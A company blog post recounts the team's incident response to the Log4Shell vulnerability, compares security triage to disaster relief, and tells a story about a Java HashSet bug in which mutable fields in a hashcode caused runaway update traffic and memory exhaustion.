Surviving the “Big One” in IT – Part I

For every kind of natural disaster, there is a “Big One”. Everybody who lived through it remembers the time, everybody else has at least heard stories about it. Every time a similar natural disaster occurs, it gets compared to this one.

We just remembered the “Boxing Day Tsunami” twenty years ago. Another example might be “The Big One”, the devastating earthquake of San Francisco in 1906. From today’s viewpoint, it wasn’t the strongest earthquake since, but it was one of the first to be extensively covered by “modern” media. It preceded the Richter scale, so we can’t directly compare it to current events.

In the rather young history of IT, we had our fair share of “natural” disasters as well. We used to give the really bad ones nicknames. The first vulnerability that was equipped with a logo and its own domain was heartbleed in 2014, ten years ago.

Let’s name-drop some big incidents:

The first entry in this list is different from the others in that it was a “near miss”. It would have been a vertitable catastrophe with millions of potentially breached and compromised systems. It just got discovered and averted right before it would have been distributed worldwide.

Another thing we can deduce from the list is the number of incidents per year:

https://www.cve.org/about/Metrics

From around 5k published vulnerabilities per year until 2014 (roughly one every two hours) it rose to 20k in 2021 and 30k in 2024. That’s 80 reports per day or 4 per hour. A single human cannot keep up with these numbers. We need to rely on filters that block out the noise and highlight the relevant issues for us.

But let’s assume that the next “Big One” happens and attains our attention. There is one common characteristic for all incidents I witnessed that is similar to earthquakes or floods: It happens everywhere at once. Let me describe the situation at the example of Log4Shell:

The first reports indicated a major vulnerability in the log4j package. That seemed bad, but it was a logging module, what could possibly happen? We could lose the log files?

It soon became clear that the vulnerability can be used from a distance by just sending over a malicious request that gets logged. Like a web request without proper authentication to a route that doesn’t exist. That’s exactly what logging is for: Capturing the outliers and preserving them for review.

Right at the moment that it dawned on us that every system with any remote accessibility was at risk, the first reports of automated attacks emerged. It was now friday late evening, the weekend just started and you realized that you are in a race against bots. The last thing you can do is call it a week and relax for 2 days. In these 48 hours, the war is lost and the systems are compromised. You know that you have at most 4 hours to:

  • Gather a list of affected projects/systems
  • Assess the realistic risk based on current knowledge
  • Hand over concrete advice to the system’s admins
  • Or employ the countermeasures yourself

In our case, that meant to review nearly 50 projects, document the decision and communicate with the operators.

While we did that, during friday night, new information occurred that not only log4j 2.x, but also 1.x was susceptible to similar attacks.

We had to review our list and decisions based on the new situation. While we were doing that, somebody on the internet refuted the claim and proclaimed the 1.x versions safe.

We had to split our investigation into two scenarios that both got documented:

  • scenario 1: Only log4j 2.x is affected
  • scenario 2: All versions of log4j are vulnerable

We employed actions based on scenario 1 and held our breath that scenario 2 wouldn’t come true.

One system with log4j 1.x was deemed “low impact” if down, so we took it off the net as a precaution. Spoiler: scenario 2 was not true, so this was an unnecessary step in hindsight. But in the moment, it was one problem off the list, regardless of scenario validity.

The thing to recognize here is that the engagement with the subject is not linear and not fixed. The scope and details of the problem change while you work on it. Uncertainties arise and need to be taken into account. When you look back on your work, you’ll notice all the unnecessary actions that you did. They didn’t appear unnecessary in the moment or at least you weren’t sure.

After we completed our system review and had carried out all the necessary actions, we switched to “survey and communicate” mode. We monitored the internet talk about the vulnerability and stayed in contact with the admins that were online. I remember an e-mail from an admin that copied some excerpts from the server logfiles with the caption: “The attacks are here!”.

And that was the moment my heart sank, because we had totally forgotten about the second front: Our own systems!

Every e-mail is processed by our mailing infrastructure and one piece of it is the mail archive. And this system is written in Java. I raced to gather insights what specific libraries are used in it. Because if a log4j 2.x library were included, the friendly admin would have just inadvertently performed a real attack on our infrastructure.

A few minutes after I finished my review (and found a log4j 1.x library), the producer of the product sent an e-mail, validating my result by saying that the product is not at risk. But those 30 minutes of uncertainty were pure panic!

In case of an airplane emergency, they always tell you to make sure you are stable first (i.e. place your own oxygen mask first). The same thing can be said about IT vulnerabilities: Mind your own systems first! We would have secured our client’s systems and then fallen prey to friendly fire if the mail archive would have been vulnerable.

Let’s re-iterate the situation we will find ourselves in when the next “Big One” hits:

  • We need to compile a list of affected instances, both under our direct control (our own systems) and under our ministration.
  • We need to assess the impact of immediate shutdown. If feasible, we should take as many systems as possible out of the equation by stopping or airgapping them.
  • We need to evaluate the risk of each instance in relation to the vulnerability. These evaluations need to be prioritized and timeboxed, because they need to be performed as fast as possible.
  • We need to document our findings (for later revision) and communicate the decision or recommendation with the operators.

This situation is remarkably similar to real-world disaster mitigation:

  • The lists of instances are disaster plans
  • The shutdowns are like evacuations
  • The risk evaluation is essentially a triage task
  • The documentation and delegation phase is the command and control phase of disaster relief crews

This helps a lot to see which elements can be prepared beforehands!

The disaster plans are the most obvious element that can be constructed during quiet times. Because no disaster occurs according to plan and plans tend to get outdated quickly, they need to be intentionally fuzzy on some details.

The evacuation itself cannot be fully prepared, but it can be facilitated by plans and automation.

The triage cannot be prepared either, but supported by checklists and training.

The documentation and communication can be somewhat formalized, but will probably happen in a chaotic and unpredictable manner.

With this insight, we can look at possible ideas for preparation and planning in the next part of this blog series.

Small cause – big effect (Story 1)

This is a story about a small programming error that caused a company-wide chaos.

Today’s modern software development is very different from the low-level programming you had to endure in the early days of computing. Computer science invented concepts like “high-level programming languages” that abstract a lot of the menial tasks away that are necessary to perform the desired functionality. Examples of these abstractions are register allocation, memory management and control structures. But even if we step into programming at a “high level”, we build whole cities of skyscrapers (metaphorically speaking) on top of those foundation layers. And still, if we make errors in the lowest building blocks of our buildings, they will come crashing down like a tower in a game of jenga.

Paris_Tuileries_Garden_Facepalm_statueThis story illustrates one such error in a small and low building block that has widespread and expensive effects. And while the problem might seem perfectly avoidable in isolation, in reality, there are no silver bullets that will solve those problems completely and forever.

The story is altered in some aspects to protect the innocent, but the core message wasn’t changed. I also want to point out that our company isn’t connected to this story in any way other than being able to retell it.

The setting

Back in the days of unreliable and slow dial-up internet connections, there was a big company-wide software system that should connect all clients, desktop computers and notebooks likewise, with a central server that should publish important news and documentation updates. The company developing and using the system had numerous field workers that connected from the hotel room somewhere near the next customer, let the updates run and disconnected again. They relied on extensive internal documentation that had to be up-to-date when working offline at the customer’s site.

Because the documentation was too big to be transferred completely after each change, but not partitioned enough to use a standard tool like rsync, the company developed a custom solution written in Java. A central server kept track of every client and all updates that needed to be delivered. This was done using a Set, more specifically a HashSet for each client. Imagine a HashMap (or Dictionary) with only a key, but no payload value. The Set’s entries were the update command objects itself. With this construct, whenever a client connected, the server could just iterate the corresponding Set and execute every object in it. After the execution had succeeded, the object was removed from the Set.

Going live

The system went live and worked instantly. All clients were served their updates and the computation power requirements for the central server were low because only few decisions needed to be made. The internet connection was the bottleneck, as expected. But it soon turned out to be too much of a bottleneck. More and more clients didn’t get all their updates. Some were provided with the most recent updates, but lacked older ones. Others only got the older ones.

The administrators asked for a bigger line and got it installed. The problems thinned out for a while, but soon returned as strong as ever. It wasn’t a problem of raw bandwidth apparently. The developers had a look at their data structure and discovered that a HashSet wouldn’t guarantee the order of traversal, so that old and new updates could easily get mixed up. But that shouldn’t be a problem because once the updates were delivered, they would be removed from the Set. And all updates had to be delivered anyways, regardless of age.

Going down

Then the central server instance stopped working with an OutOfMemoryError. The heap space of the Java virtual machine was used up by update command objects, sitting in their HashSets waiting to be executed and removed. It was clear that there were far too many update command objects to come up with a reasonable explanation. The part of the system that generated the update commands was reviewed and double-checked. No errors related to the problem at hand were found.

The next step was a review of the algorithm for iterating, executing and removing the update commands. And there, right in the update command class, the cause was found: The update command objects calculated their hashcode value based on their data fields, including the command’s execution date. Every time the update command was executed, this date field was updated to the most recent value. This caused the hashcode value of the object to change. And this had the effect that the update command object couldn’t be removed from the Set because the HashSet implementation relies on the hashcode value to find its objects. You could ask the Set if the object was still contained and it would answer “no”, but still include it into each loop over the content.

The cause

The Sets with update commands for the clients always grew in size, because once a update command object was executed, it couldn’t be removed but appeared absent. Whenever a client connected, it got served all update commands since the beginning, over and over again in semi-random order. This explained why sometimes, the most recent updates were delivered, but older ones were still missing. It also explained why the bandwidth was never enough and all clients lacked updates sooner or later.

The cost of this excessive update orgy was substantial: numerous clients had leeched all (useless) data they could get until the connection was cut, day for day, over expensive long-distance calls. Yet, they lacked crucial updates that caused additional harm and chaos. And all this damage could be tracked down to a simple programming error:

Never include mutable data into the calculation of a hashkey.